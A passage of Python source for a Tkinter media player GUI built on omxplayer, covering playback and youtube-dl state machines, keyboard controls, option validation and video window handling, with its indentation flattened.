def volminus(self):
self.send_command('-')
def time_string(self,secs):
minu = int(secs/60)
sec = secs-(minu*60)
return str(minu)+":"+str(int(sec))
def what_next(self):
if self.break_required_signal==True:
self.hide_progress_bar()
self.monitor("What next, break_required so exit")
self.set_play_button_state(0)
def break_required_signal_false():
self.break_required_signal=False
self.root.after(650, break_required_signal_false)
# fall out of the state machine
return
elif self.play_next_track_signal ==True:
# called when state machine is in the omx_closed state in order to decide what to do next.
self.monitor("What next, skip to next track")
self.play_next_track_signal=False
if self.options.mode=='shuffle':
self.random_next_track()
self.play()
else:
self.select_next_track()
self.play()
return
elif self.play_previous_track_signal ==True:
self.monitor("What next, skip to previous track")
self.select_previous_track()
self.play_previous_track_signal=False
self.play()
return
elif self.options.mode=='single':
self.monitor("What next, single track so exit")
self.set_play_button_state(0)
# fall out of the state machine
return
elif self.options.mode=='repeat':
self.monitor("What next, Starting repeat track")
self.play()
return
elif 'playlist' in self.options.mode:
if not 'repeat' in self.options.mode and self.start_track_index == self.playlist.length() - 1:
self.stop_required_signal=True
self.set_play_button_state(0)
self.monitor("What next, reached end of playlist, so exit")
return
self.monitor("What next, Starting playlist track")
self.select_next_track()
self.play()
return
elif self.options.mode=='shuffle':
self.monitor("What next, Starting random track")
self.random_next_track()
self.play()
return
# ***************************************
# YTDL STATE MACHINE
# ***************************************
def go_ytdl(self, url, playlist=False):
self.quit_ytdl_sent_signal = False
if self.ytdl_state in (self._YTDL_CLOSED, self._YTDL_ENDING):
self.ytdl_state=self._YTDL_STARTING
self.ytdl.start_signal=True
youtube_media_format = self.options.youtube_media_format
if not playlist:
self.ytdl.retrieve_media_url(url, youtube_media_format)
else:
self.ytdl.retrieve_youtube_playlist(url, youtube_media_format)
if self.ytdl_state==self._YTDL_STARTING:
self.ytdl_state_machine()
def go_ytdl_subtitles(self, track):
self.ytdl.download_subtitles(self.options.subtitles_lang, track[2])
while (not self.ytdl.subtitle_ready_signal and
not self.ytdl.download_subtitle_failed_signal):
sleep(0.2)
self.start_omx(track[0], skip_ytdl_check = True)
def ytdl_state_machine(self):
if self.ytdl_state == self._YTDL_CLOSED:
self.monitor(" Ytdl state machine: " + self.ytdl_state)
return
elif self.ytdl_state == self._YTDL_STARTING:
self.monitor(" Ytdl state machine: " + self.ytdl_state)
if self.ytdl.start_signal==True:
self.monitor(" <start play signal received from youtube-dl")
self.ytdl.start_signal=False
self.ytdl_state=self._YTDL_WORKING
self.monitor(" Ytdl state machine: "+self.ytdl_state)
self.root.after(500, self.ytdl_state_machine)
elif self.ytdl_state == self._YTDL_WORKING:
try:
if len(self.ytdl.finished_processes):
for url in self.ytdl.finished_processes:
process = self.ytdl.finished_processes[url]
self.treat_ytdl_result(url, process[1])
self.ytdl.finished_processes = {}
if not self.ytdl.is_running():
self.ytdl_state = self._YTDL_ENDING
except Exception:
log.logException()
sys.exc_clear()
self.root.after(500, self.ytdl_state_machine)
elif self.ytdl_state == self._YTDL_ENDING:
self.ytdl.reset_processes()
self.monitor(" Ytdl state machine: " + self.ytdl_state)
self.monitor(" Ytdl state machine: is process running - " + str(self.ytdl.is_running()))
self.ytdl_state = self._YTDL_CLOSED
self.root.after(500, self.ytdl_state_machine)
def treat_ytdl_result(self, url, res):
if res[0] == 1:
try:
result = json.loads(res[1])
except Exception:
log.logException()
sys.exc_clear()
self.remove_waiting_track(url)
return
if 'entries' in result:
self.treat_youtube_playlist_data(result)
else:
self.treat_video_data(url, result)
else:
self.remove_waiting_track(url)
if self.play_state==self._OMX_STARTING:
self.quit_sent_signal = True
self.display_selected_track_title.set(self.YTDL_MSGS[res[1]])
self.root.after(3000, lambda: self.display_selected_track())
return
def treat_video_data(self, url, data):
media_url = self._treat_video_data(data, data['extractor'])
if not media_url and self.options.youtube_video_quality == "small":
media_url = self._treat_video_data(data, data['extractor'], "medium")
if not media_url:
media_url = data['url']
tracks = self.playlist.waiting_tracks()
if tracks:
for track in tracks:
if track[1][0] == url:
self.playlist.replace(track[0],[media_url, data['title'], url])
if self.play_state == self._OMX_STARTING:
self.start_omx(media_url,skip_ytdl_check=True)
self.refresh_playlist_display()
self.playlist.select(track[0])
break
def treat_youtube_playlist_data(self, data):
for entry in data['entries']:
media_url = self._treat_video_data(entry, data['extractor'])
if not media_url and self.options.youtube_video_quality == "small":
media_url = self._treat_video_data(entry, data['extractor'], "medium")
if not media_url:
media_url = entry['url']
self.playlist.append([media_url,entry['title'],''])
self.playlist.select(self.playlist.length() - len(data['entries']))
self.refresh_playlist_display()
self.root.after(3000, lambda: self.display_selected_track())
def _treat_video_data(self, data, extractor, force_quality=False):
media_url = None
media_format = self.options.youtube_media_format
quality = self.options.youtube_video_quality if not force_quality else force_quality
if extractor != "youtube" or (media_format == "mp4" and quality == "high"):
media_url = data['url']
else:
preference = -100
for format in data['formats']:
if ((media_format == format['ext'] == "m4a" and
((quality == "high" and format['abr'] == 256) or
(quality in ("medium", "small") and format['abr'] == 128))) or
(media_format == format['ext'] == "mp4" and
quality == format['format_note'])):
if 'preference' in format and format['preference'] > preference:
preference = format['preference']
media_url = format['url']
else:
media_url = format['url']
return media_url
def ytdl_update_messages_loop(self):
if not self.ytdl.updating_signal:
if self.ytdl.updated_signal:
tkMessageBox.showinfo("",_("youtube-dl has been updated."))
elif self.ytdl.update_failed_signal:
tkMessageBox.showinfo("",_("Failed to update youtube-dl."))
else:
if self.ytdl.password_requested_signal and not self.ytdl.has_password_signal:
password = tkSimpleDialog.askstring("", _("youtube-dl needs to be updated.\nPlease inform your password."), parent=self.root, show="*")
if password: self.ytdl.set_password(password)
else: return
self.root.after(500, self.ytdl_update_messages_loop)
# ***************************************
# WRAPPER FOR JBAITER'S PYOMXPLAYER
# ***************************************
def start_omx(self, track, skip_ytdl_check=False):
""" Loads and plays the track"""
if not skip_ytdl_check and self.ytdl.whether_to_use_youtube_dl(track):
self.go_ytdl(track)
index = self.playlist.selected_track_index()
track = self.playlist.selected_track()
track = (track[0], self.YTDL_WAIT_TAG+track[1])
self.playlist.replace(index, track)
self.playlist.select(index)
self.refresh_playlist_display()
return
if ("http" in track and
self.options.omx_subtitles and
not self.ytdl.subtitle_ready_signal and
not self.ytdl.download_subtitle_failed_signal):
track = self.playlist.selected_track()
self.go_ytdl_subtitles(track)
return
track= "'"+ track.replace("'","'\\''") + "'"
opts= (self.options.omx_user_options + " " + self.options.omx_audio_output + " " +
" --vol " + str(self.get_mB()) + " " + self.options.omx_subtitles + " " +
(" --subtitles " + self.ytdl._YTLAUNCH_SUB_DIR + "/subtitle." + self.options.subtitles_lang + ".srt" if self.ytdl.subtitle_ready_signal else ""))
#print(639, "self.media_is_video()",self.media_is_video())
#print(hasattr(self,"omx"), hasattr(self.omx, "video"), len(self.omx.video) > 0)
#if self.media_is_video():
if not self.options.forbid_windowed_mode and not self.options.full_screen and '--win' not in opts:
mc = self.RE_COORDS.match(self.options.windowed_mode_coords)
mg = self.RE_RESOLUTION.match(self.options.windowed_mode_resolution)
if mc and mg:
w, h, x, y = [int(v) for v in mg.groups()+mc.groups()]
opts += ' --win %d,%d,%d,%d' % (x, y, x+w, y+h)
if not '--aspect-mode' in opts:
opts += ' --aspect-mode letterbox'
if not '--no-osd' in opts:
opts += ' --no-osd'
self.monitor('starting omxplayer with args: "%s"' % (opts,))
self.omx = OMXPlayer(track, args=opts, start_playback=True)
self.monitor(" >Play: " + track + " with " + opts)
def stop_omx(self):
if self.play_state == self._OMX_PLAYING:
self.monitor(" >Send stop to omx")
self.omx.stop()
else:
self.monitor (" !>stop not sent to OMX because track not playing")
def send_command(self,command):
if command in "+=-pz12jkionms" and self.play_state == self._OMX_PLAYING:
self.monitor(" >Send Command: "+command)
self.omx.send_command(command)
if self.dbus_connected and command in ('+' , '=', '-'):
sleep(0.1)
try:
self.set_volume_bar_step(int(self.vol2dB(self.omx.volume())+self.volume_normal_step))
except Exception:
log.logException()
sys.exc_clear()
self.monitor("Failed to set volume bar step")
return True
else:
if command in "+=":
self.set_volume_bar_step(self.volume_var.get() + 3)
elif command == '-':
self.set_volume_bar_step(self.volume_var.get() - 3)
self.monitor (" !>Send command: illegal control or track not playing")
return False
def send_special(self,command):
if self.play_state == self._OMX_PLAYING:
self.monitor(" >Send special")
self.omx.send_command(command)
return True
else:
self.monitor (" !>Send special: track not playing")
return False
# ***************************************
# INIT
# ***************************************
def __init__(self, options):
# initialise options class and do initial reading/creation of options
self.options=options
if self.options.debug:
log.setLogFile(self.options.log_file)
log.enableLogging()
self.monitor('started logging to file "%s"' % (self.options.log_file,))
else:
log.disableLogging()
#initialise the play state machine
self.init_play_state_machine()
# start and configure ytdl object
self.ytdl = Ytdl(self.options,
lambda: tkMessageBox.showinfo("",_("youtube-dl binary is not in the path configured in the Options, please check your configuration")))
#create the internal playlist
self.playlist = PlayList(self.YTDL_WAIT_TAG)
#root is the Tkinter root widget
self.root = tk.Tk()
icon_photo = tk.PhotoImage(file=os.path.dirname(os.path.realpath(__file__)) + '/ico/48x48.png')
self.root.call('wm', 'iconphoto', self.root._w, icon_photo)
#self.root.iconphoto()
self.root.title("GUI for OMXPlayer")
self.root.configure(background='grey')
# width, height, xoffset, yoffset
self.root.geometry(self.options.geometry)
self.root.resizable(True,True)
OMXPlayer.set_omx_location(self.options.omx_location)
# bind some display fields
self.filename = tk.StringVar()
self.display_selected_track_title = tk.StringVar()
self.display_time = tk.StringVar()
self.volume_var = tk.IntVar()
self.progress_bar_var = tk.IntVar()
self.root.bind("<Configure>", self.save_geometry)
#Keys
self.root.bind("<Left>", self.key_left)
self.root.bind("<Right>", self.key_right)
self.root.bind("<Up>", self.key_up)
self.root.bind("<Down>", self.key_down)
self.root.bind("<Shift-Right>", self.key_shiftright) #forward 600
self.root.bind("<Shift-Left>", self.key_shiftleft) #back 600
self.root.bind("<Control-Right>", self.key_ctrlright) #next track
self.root.bind("<Control-Left>", self.key_ctrlleft) #previous track
self.root.bind("<Control-v>", self.add_url)
self.root.bind("<Escape>", self.key_escape)
self.root.bind("<F11>", self.toggle_full_screen)
self.root.bind("<Control_L>", self.vwindow_start_resize)
self.root.bind("<KeyRelease-Control_L>", self.vwindow_stop_resize)
self.root.bind('<Button-3>', self.add_url)
self.root.bind("<Key>", self.key_pressed)
self.style = Style()
self.style.theme_use("alt")
# define menu
menubar = Menu(self.root)
filemenu = Menu(menubar, tearoff=0, background="grey", foreground="black")
menubar.add_cascade(label=_('Track'), menu = filemenu)
filemenu.add_command(label=_('Add'), command = self.add_track)
filemenu.add_command(label=_('Add Dir'), command = self.add_dir)
filemenu.add_command(label=_('Add Dirs'), command = self.add_dirs)
filemenu.add_command(label=_('Add URL'), command = self.add_url)
filemenu.add_command(label=_('Youtube search'), command = self.youtube_search)
filemenu.add_command(label=_('Remove'), command = self.remove_track)
filemenu.add_command(label=_('Edit'), command = self.edit_track)
listmenu = Menu(menubar, tearoff=0, background="grey", foreground="black")
menubar.add_cascade(label=_('Playlists'), menu = listmenu)
listmenu.add_command(label=_('Open playlist'), command = self.open_list_dialog)
listmenu.add_command(label=_('Save playlist'), command = self.save_list)
listmenu.add_command(label=_('Load Youtube playlist'), command = self.load_youtube_playlist)
listmenu.add_command(label=_('Clear'), command = self.clear_list)
omxmenu = Menu(menubar, tearoff=0, background="grey", foreground="black")
menubar.add_cascade(label='OMX', menu = omxmenu)
omxmenu.add_command(label=_('Track Info'), command = self.show_omx_track_info)
optionsmenu = Menu(menubar, tearoff=0, background="grey", foreground="black")
menubar.add_cascade(label=_('Options'), menu = optionsmenu)
optionsmenu.add_command(label=_('Edit'), command = self.edit_options)
helpmenu = Menu(menubar, tearoff=0, background="grey", foreground="black")
menubar.add_cascade(label=_('Help'), menu = helpmenu)
helpmenu.add_command(label=_('Help'), command = self.show_help)
helpmenu.add_command(label=_('About'), command = self.about)
self.root.config(menu=menubar)
# define buttons
# add track button
Button(self.root, width = 5, height = 1, text=_('Add'),
foreground='black', command = self.add_track,
background="light grey").grid(row=0, column=1, rowspan=2, sticky=N+W+E+S)
# add dir button
Button(self.root, width = 5, height = 1, text=_('Add Dir'),
foreground='black', command = self.add_dir,
background="light grey").grid(row=0, column=2, rowspan=2, sticky=N+W+E+S)
# add url button
Button(self.root, width = 5, height = 1, text=_('Add URL'),
foreground='black', command = self.add_url,
background="light grey").grid(row=0, column=3, rowspan=2, sticky=N+W+E+S)
# open list button
Button(self.root, width = 5, height = 1, text=_('Open List'),
foreground='black', command = self.open_list_dialog,
background="light grey").grid(row=0, column=4, rowspan=2, sticky=N+W+E+S)
# save list button
Button(self.root, width = 5, height = 1, text =_('Save List'),
foreground='black', command = self.save_list,
background='light grey').grid(row=0, column=5, rowspan=2, sticky=N+W+E+S)
# clear list button;
Button(self.root, width = 5, height = 1, text =_('Clear List'),
foreground='black', command = self.clear_list,
background='light grey').grid(row=0, column=6, rowspan=2, sticky=N+W+E+S)
# play/pause button
self.play_button = Button(self.root, width = 5, height = 1, text=_('Play'),
foreground='black', command = self.play_track,
background="light grey")
self.play_button.grid(row=7, column=1, sticky=N+W+E+S)
# stop track button
Button(self.root, width = 5, height = 1, text=_('Stop'),
foreground='black', command = self.stop_track,
background="light grey").grid(row=7, column=2, sticky=N+W+E+S)
# previous track button
Button(self.root, width = 5, height = 1, text=_('Previous'),
foreground='black', command = self.skip_to_previous_track,
background="light grey").grid(row=7, column=3, sticky=N+W+E+S)
# next track button
Button(self.root, width = 5, height = 1, text=_('Next'),
foreground='black', command = self.skip_to_next_track,
background="light grey").grid(row=7, column=4, sticky=N+W+E+S)
# vol button
minusplus_button = Button(self.root, width = 5, height = 1, text = '- Vol +',
foreground='black', background='light grey')
minusplus_button.grid(row=7, column=5, sticky=N+W+E+S)#, sticky=E)
minusplus_button.bind("<ButtonRelease-1>", self.volminusplus)
# define display of file that is selected
Label(self.root, font=('Comic Sans', 10),
fg = 'black', wraplength = 400, height = 2,
textvariable=self.display_selected_track_title,
background="grey").grid(row=2, column=1, columnspan=6, sticky=N+W+E)
# define time/status display for selected track
Label(self.root, font=('Comic Sans', 9),
fg = 'black', wraplength = 100,
textvariable=self.display_time,
background="grey").grid(row=2, column=6, columnspan=1, sticky=N+W+E+S)
# define display of playlist
self.track_titles_display = Listbox(self.root, background="white", height = 15,
foreground="black", takefocus=0)
self.track_titles_display.grid(row=3, column=1, columnspan=7,rowspan=3, sticky=N+S+E+W)
self.track_titles_display.bind("<ButtonRelease-1>", self.select_track)
self.track_titles_display.bind("<Delete>", self.remove_track)
self.track_titles_display.bind("<Return>", self.key_return)
self.track_titles_display.bind("<Double-1>", self.select_and_play)
# scrollbar for displaylist
scrollbar = Scrollbar(self.root, command=self.track_titles_display.yview, orient=tk.VERTICAL)
scrollbar.grid(row = 3, column=6, rowspan=3, sticky=N+S+E)
self.track_titles_display.config(yscrollcommand=scrollbar.set)
# progress bar
self.style.configure("progressbar.Horizontal.TProgressbar", foreground='medium blue', background='medium blue')
self.progress_bar = Progressbar(orient=HORIZONTAL, length=self.progress_bar_total_steps, mode='determinate',
maximum=self.progress_bar_total_steps, variable=self.progress_bar_var,
style="progressbar.Horizontal.TProgressbar")
self.progress_bar.grid(row=6, column=1, columnspan=6, sticky=N+W+E+S)
self.progress_bar.grid_remove()
self.progress_bar.bind("<ButtonRelease-1>", self.set_track_position)
self.progress_bar_var.set(0)
# volume bar, volume meter is 0.0 - 16.0, being normal volume 1.0
self.style.configure("volumebar.Horizontal.TProgressbar", foreground='cornflower blue', background='cornflower blue')
self.volume_bar = Progressbar(orient=HORIZONTAL, length=self.volume_max, mode='determinate',
maximum=self.volume_max, variable=self.volume_var,
style="volumebar.Horizontal.TProgressbar")
self.volume_bar.grid(row=7, column=6, stick=W+E)
self.volume_bar.bind("<ButtonRelease-1>", self.set_volume_bar)
self.volume_var.set(self.volume_normal_step)
# configure grid
self.root.grid_columnconfigure(1, weight=1)
self.root.grid_columnconfigure(2, weight=1)
self.root.grid_columnconfigure(3, weight=1)
self.root.grid_columnconfigure(4, weight=1)
self.root.grid_columnconfigure(5, weight=1)
self.root.grid_columnconfigure(6, weight=1)
self.root.grid_rowconfigure(1, weight=0)
self.root.grid_rowconfigure(2, weight=0)
self.root.grid_rowconfigure(3, weight=1, minsize=40)
self.root.grid_rowconfigure(4, weight=0)
self.root.grid_rowconfigure(5, weight=0)
self.root.grid_rowconfigure(6, weight=0)
self.root.grid_rowconfigure(7, weight=0)
# if files were passed in the command line, add them to the playlist
for f in sys.argv[1:]:
if os.path.isfile(f) and self.is_file_supported(f):
self.file = f
self.file_pieces = self.file.split("/")
self.playlist.append([self.file, self.file_pieces[-1],'',''])
self.track_titles_display.insert(END, self.file_pieces[-1])
elif os.path.isfile(f) and f[f.rfind('.')+1:]=="csv":
self._open_list(f)
if self.playlist.length() > 0 and self.options.autoplay:
if self.options.mode=='shuffle':
self.random_next_track()
else:
self.select_track(False)
self.play_track()
self.dnd = DnD(self.root)
self.dnd.bindtarget(self.root, 'text/uri-list', '<Drop>', self.add_drag_drop)
if self.options.ytdl_update:
self.ytdl.check_for_update()
self.ytdl_update_messages_loop()
def shutdown(self):
self.root.quit()
self.ytdl.quit()
if self.omx is not None:
self.omx.stop()
self.omx.kill()
# ***************************************
# MISCELLANEOUS
# ***************************************
def edit_options(self):
"""edit the options then read them from file"""
eo = OptionsDialog(self.root, self.options.options_file,_('Edit Options'))
self.options.read(self.options.options_file)
self.ytdl.set_options(self.options)
OMXPlayer.set_omx_location(self.options.omx_location)
def show_help (self):
tkMessageBox.showinfo(_("Help"),
_("To control playing, type a key\np - pause/play\nspacebar - pause/play\nq - quit\n")
+ _("+ - increase volume\n- - decrease volume\nz - tv show info\n1 - reduce speed\no - forward a chapter\n")
+ _("2 - increase speed\nj - previous audio index\nk - next audio index\ni - back a chapter\nn - previous subtitle index\n")
+ _("m - next subtitle index\ns - toggle subtitles\n>cursor - seek forward 30\n<cursor - seek back 30\n")
+ _("SHIFT >cursor - seek forward 600\nSHIFT <cursor - seek back 600\nCTRL >cursor - next track\nCTRL <cursor - previous track\n")
+ _("F11 - toggle full screen/windowed mode\n\nFor more help, consult the 'Operation' section of the README file"))
def about (self):
tkMessageBox.showinfo(_("About"),_("GUI for omxplayer using jbaiter's pyomxplayer wrapper\n")
+((_("Version dated: %s \nAuthor:\n Ken Thompson - KenT2\n")) % datestring)
+_("Contributors:\n eysispeisi\n heniotierra\n krugg\n popiazaza"))
def monitor(self,text):
if self.options.debug:
log.debug(text)
# Key Press callbacks
def key_right(self,event):
self.send_special('\x1b\x5b\x43')
self.monitor("Seek forward 30")
def key_left(self,event):
self.send_special('\x1b\x5b\x44')
self.monitor("Seek back 30")
def key_shiftright(self,event):
self.send_special('\x1b\x5b\x42')
self.monitor("Seek forward 600")
def key_shiftleft(self,event):
self.send_special('\x1b\x5b\x41')
self.monitor("Seek back 600")
def key_ctrlright(self,event):
self.skip_to_next_track()
def key_ctrlleft(self,event):
self.skip_to_previous_track()
def key_up(self,event):
self.select_previous_track()
def key_down(self,event):
self.select_next_track()
def key_escape(self,event):
self.stop_track()
def key_return(self,event):
self.stop_track()
def play_aux():
self.start_track_index = self.playlist.selected_track_index()
self.play()
self.root.after(1500, play_aux)
def key_pressed(self,event):
char = event.char
if char=='':
return
elif char in ('p', ' ', '.'):
self.play_track()
return
elif char=='q':
self.stop_track()
return
else:
self.send_command(char)
return
def grab_lyrics(self):
track = self.playlist.selected_track()
track_title = track[1]
if ('title' in self.omx.misc and
self.omx.misc['title'] and
'artist' in self.omx.misc and
self.omx.misc['artist']):
track_title = self.omx.misc['artist'] + '-' + self.omx.misc['title']
self.autolyrics = AutoLyrics(self.root, self.options.autolyrics_coords, self._save_autolyrics_coords, track_title)
def save_geometry(self, *sec):
self.options.geometry = self.root.geometry()
self.options.save_state()
def _save_autolyrics_coords(self, *event):
x = self.autolyrics.winfo_x()
y = self.autolyrics.winfo_y()
self.options.autolyrics_coords = ("+" if x>=0 else "-")+str(x)+("+" if y>=0 else "-")+str(y)
def set_option(self, option, value):
boolean = ["0", "1"]
allowed_options_values = {
"omx_user_options": "str",
"omx_location": "str",
"ytdl_location": "str",
"omx_audio_output": ["hdmi","local","both","alsa"],
"mode": ["single", "repeat","playlist","repeat playlist", "shuffle"],
"debug": ["on", "off"],
"youtube_media_format": ["mp4", "m4a"],
"download_media_url_upon": ["add","play"],
"youtube_video_quality": ["small", "medium","high"],
"windowed_mode_coords": self.RE_COORDS,
"windowed_mode_resolution": self.RE_RESOLUTION,
"autolyrics_coords": self.RE_COORDS,
"forbid_windowed_mode": boolean,
"cue_track_mode": boolean,
"autoplay": boolean,
"find_lyrics": boolean,
"full_screen": boolean
}
try:
allowed_option_values = allowed_options_values[option]
except KeyError:
raise KeyError("Option " + option + " is invalid")
option_type = str(type(allowed_option_values))
if (allowed_option_values == "str" or
("list" in option_type and value in allowed_option_values) or
("SRE_Pattern" in option_type and allowed_option_values.match(value) != None)):
if allowed_option_values == boolean:
value = int(value)
setattr(self.options, option, value)
self.options.save_state()
self.options.read(self.options.options_file)
if option == "ytdl_location":
self.ytld.set_options(self.options)
elif option=="omx_location":
OMXPlayer.set_omx_location(self.options.omx_location)
else: raise AttributeError("Option value does not match an expected value or pattern")
# ******************************************
# PROGRESS BAR CALLBACKS
# ******************************************
def set_progress_bar(self):
try:
self.progress_bar_step_rate = self.omx.timenf['duration']/self.progress_bar_total_steps
except Exception:
log.logException()
sys.exc_clear()
return False
def show_progress_bar(self):
self.progress_bar.grid()
def hide_progress_bar(self):
self.progress_bar.grid_remove()
def reset_progress_bar(self):
self.progress_bar_var.set(0)
def set_track_position(self,event):
if not self.dbus_connected: return
new_track_position = self.progress_bar_step_rate * ((event.x * self.progress_bar_total_steps)/event.widget.winfo_width())
try:
self.omx.set_position(new_track_position)
except Exception:
log.logException()
sys.exc_clear()
self.monitor("Failed to set track position")
self.focus_root()
def set_progress_bar_step(self):
try:
self.progress_bar_var.set(int((self.omx.position * self.progress_bar_total_steps)/self.omx.timenf['duration']))
except Exception:
log.logException()
sys.exc_clear()
self.monitor('Error trying to set progress bar step')
# ******************************************
# VIDEO WINDOW FUNCTIONS
# ******************************************
def create_vprogress_bar(self):
screenres = self.get_screen_res()
vsize = self.omx.video['dimensions']
self.vprogress_bar_window = Toplevel(master=self.root)
self.vprogress_bar_frame = Frame(self.vprogress_bar_window, bg="black")
self.vprogress_bar_frame.pack(fill=BOTH,side=TOP, expand=True)
#defne response to main window closing
self.vprogress_bar_window.protocol ("WM_DELETE_WINDOW", self.vprogress_bar_window.destroy)
self.vprogress_bar_window.video_height = screenres[1]
self.vprogress_bar_window.video_width = int(vsize[0] * (screenres[1] / float(vsize[1])))
self.vprogress_bar_window.resizing = 0
if self.vprogress_bar_window.video_width > screenres[0] + 20:
self.vprogress_bar_window.video_width = screenres[0]
self.vprogress_bar_window.video_height = int(vsize[1] * (screenres[0] / float(vsize[0])))
if self.options.full_screen:
geometry = "%dx%d-0-0" % screenres
else:
coords = self.options.windowed_mode_coords
coords_m = self.RE_COORDS.match(coords)
if coords_m is None or int(coords_m.group(1))>screenres[0] or int(coords_m.group(2))>screenres[1]:
coords = "+200+200"
geometry = self.options.windowed_mode_resolution + coords
self.vprogress_bar_window.geometry(geometry)
self.vprogress_bar_window.overrideredirect(1)
self.vprogress_bar_window.resizable(True,True)
self.vprogress_bar = Progressbar(self.vprogress_bar_window, orient=HORIZONTAL, length=self.progress_bar_total_steps, mode='determinate',
maximum=self.progress_bar_total_steps, variable=self.progress_bar_var,
style="progressbar.Horizontal.TProgressbar")
self.vprogress_bar.pack(in_=self.vprogress_bar_frame, fill=BOTH,side=BOTTOM)
self.root.update()
self.vprogress_bar.bind("<ButtonRelease-1>", self.set_track_position)
self.vprogress_bar_window.bind("<Configure>", self.move_video)
self.vprogress_bar_window.bind("<ButtonPress-1>", self.vwindow_start_move)
self.vprogress_bar_window.bind("<ButtonRelease-1>", self.vwindow_stop_move)
self.vprogress_bar_window.bind("<B1-Motion>", self.vwindow_motion)
self.vprogress_bar_window.bind("<Double-Button-1>", self.toggle_full_screen)
self.vprogress_bar_window.bind("<Motion>", self.vwindow_show_and_hide)
self.vprogress_bar_window.bind("<Double-1>", self.restore_window)
# Resize widget, placed in the lower right corner over the progress bar, not ideal.
self.vprogress_grip = Sizegrip(self.vprogress_bar_window)
self.vprogress_grip.place(relx=1.0, rely=1.0, anchor="se")
self.vprogress_grip.bind("<ButtonPress-1>", self.vwindow_start_resize)
self.vprogress_grip.bind("<ButtonRelease-1>", self.vwindow_stop_resize)
self.vprogress_grip.bind("<B1-Motion>", self.vwindow_motion)
self.vprogress_bar_window.protocol ("WM_TAKE_FOCUS", self.focus_root)
self.vwindow_show_and_hide()
def vwindow_start_move(self, event):
if self.options.full_screen == 1: return
self.vprogress_bar_window.x = event.x
self.vprogress_bar_window.y = event.y
def vwindow_stop_move(self, event):
if self.options.full_screen == 1: return
self.vprogress_bar_window.x = None
self.vprogress_bar_window.y = None
self.save_video_window_coordinates()
def vwindow_motion(self, event):
if self.options.full_screen == 1:
return
try:
deltax = (event.x - self.vprogress_bar_window.x)/2
deltay = (event.y - self.vprogress_bar_window.y)/2
except (TypeError, AttributeError):
log.logException()
sys.exc_clear()
return
if not self.vprogress_bar_window.resizing:
x = self.vprogress_bar_window.winfo_x() + deltax
y = self.vprogress_bar_window.winfo_y() + deltay
self.vprogress_bar_window.geometry("+%s+%s" % (x, y))
else:
w = self.vprogress_bar_window.winfo_width() + deltax
h = self.vprogress_bar_window.winfo_height() + deltay
try:
self.vprogress_bar_window.geometry("%sx%s" % (w, h))
except Exception:
log.logException()
sys.exc_clear()
self.options.full_screen = 1
self.toggle_full_screen()
self.vwindow_show_and_hide()
def vwindow_start_resize(self,event):
if (not self.media_is_video() or
self.options.full_screen == 1 or
not self.vprogress_bar_window):
return
self.vprogress_bar_window.resizing = 1
def vwindow_stop_resize(self,event):
if (not self.media_is_video() or
self.options.full_screen == 1 or
not self.vprogress_bar_window):
return
self.vprogress_bar_window.resizing = 0
self.save_video_window_coordinates()
def vwindow_show_and_hide(self, *event):
self.vprogress_bar.lift(self.vprogress_bar_frame)
if not self.options.full_screen:
self.vprogress_grip.lift(self.vprogress_bar)
self.move_video(pbar=True)
if not hasattr(self, '_vwindow_show_and_hide_flag'):
self._vwindow_show_and_hide_flag = None
if self._vwindow_show_and_hide_flag is None:
self._vwindow_show_and_hide_flag = self.root.after(3000, self.vwindow_hide)
else:
# refresh timer
self.root.after_cancel(self._vwindow_show_and_hide_flag)
self._vwindow_show_and_hide_flag = self.root.after(3000, self.vwindow_hide)
def vwindow_hide(self):
if self.play_state == self._OMX_PLAYING:
self._vwindow_show_and_hide_flag = None
self.vprogress_bar.lower(self.vprogress_bar_frame)
self.vprogress_grip.lower(self.vprogress_bar_frame)
self.move_video(pbar=False)
def set_full_screen(self,*event):
if not self.dbus_connected: return
screenres = self.get_screen_res()
try:
self.omx.set_video_geometry(0, 0, screenres[0], screenres[1])
self.vprogress_grip.lower(self.vprogress_bar_frame)
except Exception as e:
self.monitor(' [!] set_full_screen failed')
self.monitor(e)
def toggle_full_screen(self,*event):
hasvbw = hasattr(self, 'vprogress_bar_window')
if (not self.dbus_connected
or self.options.forbid_windowed_mode
or not self.media_is_video()
or not hasvbw
or (hasvbw and not self.vprogress_bar_window)):
return
screenres = self.get_screen_res()
if self.options.full_screen == 1:
self.options.full_screen = 0
width, height = (480, 360)
vsize_m = self.RE_RESOLUTION.match(self.options.windowed_mode_resolution)
if vsize_m:
width, height = [int(i) for i in vsize_m.groups()]
coords = self.options.windowed_mode_coords
coords_m = self.RE_COORDS.match(coords)
if coords_m is None or int(coords_m.group(1))>screenres[0] or int(coords_m.group(2))>screenres[1]:
coords = "+200+200"
geometry = "%dx%d%s" % (width, height, coords)
self.vprogress_bar_window.geometry(geometry)
else:
self.options.full_screen = 1
self.save_video_window_coordinates()
geometry = "%dx%d+%d+%d" % ( screenres[0], screenres[1], 0, 0)
self.vprogress_bar_window.geometry(geometry)
self.set_full_screen()
self.vprogress_grip.lower(self.vprogress_bar_frame)
self.vwindow_show_and_hide()
self.focus_root()
def move_video(self,event=None, pbar=True):
if not self.dbus_connected:
return
if not self.options.full_screen:
w = self.vprogress_bar_window.winfo_width()
h = self.vprogress_bar_window.winfo_height()
x1 = self.vprogress_bar_window.winfo_x()
y1 = self.vprogress_bar_window.winfo_y()
else:
w, h= self.get_screen_res()
x1 = y1 = 0
x2 = w+x1
y2 = h+y1
if pbar:
y2 -= self.vprogress_bar.winfo_height()
try:
self.omx.set_video_geometry(x1, y1, x2, y2)
except Exception as e:
self.monitor(' [!] move_video failed')
self.monitor(e)
self.focus_root()
def destroy_vprogress_bar(self):
try:
if self.options.full_screen == 0:
self.save_video_window_coordinates()
self.vprogress_bar_window.destroy()
self.vprogress_bar_window = None
except Exception:
log.logException()
sys.exc_clear()
self.monitor("Failed trying to destroy video window: video window nonexistent.")
def get_screen_res(self):
return (screen_width(), screen_height())
def media_is_video(self):
return hasattr(self,"omx") and hasattr(self.omx, "video") and len(self.omx.video) > 0
def restore_window(self, *event):
self.root.update()
self.root.deiconify()
def focus_root(self, *event):
self.root.focus()
def save_video_window_coordinates(self):
x = self.vprogress_bar_window.winfo_x()
y = self.vprogress_bar_window.winfo_y()
h = self.vprogress_bar_window.winfo_height()
w = self.vprogress_bar_window.winfo_width()
self.options.windowed_mode_coords = ("+" if x>=0 else "-")+str(x)+("+" if y>=0 else "-")+str(y)
self.options.windowed_mode_resolution = "%dx%d" % (w, h)
self.monitor('Saving windowed geometry: "%s%s"' % (self.options.windowed_mode_resolution,self.options.windowed_mode_coords))
# ***************************************
# VOLUME BAR CALLBACKS
# ***************************************
def set_volume_bar(self, event):
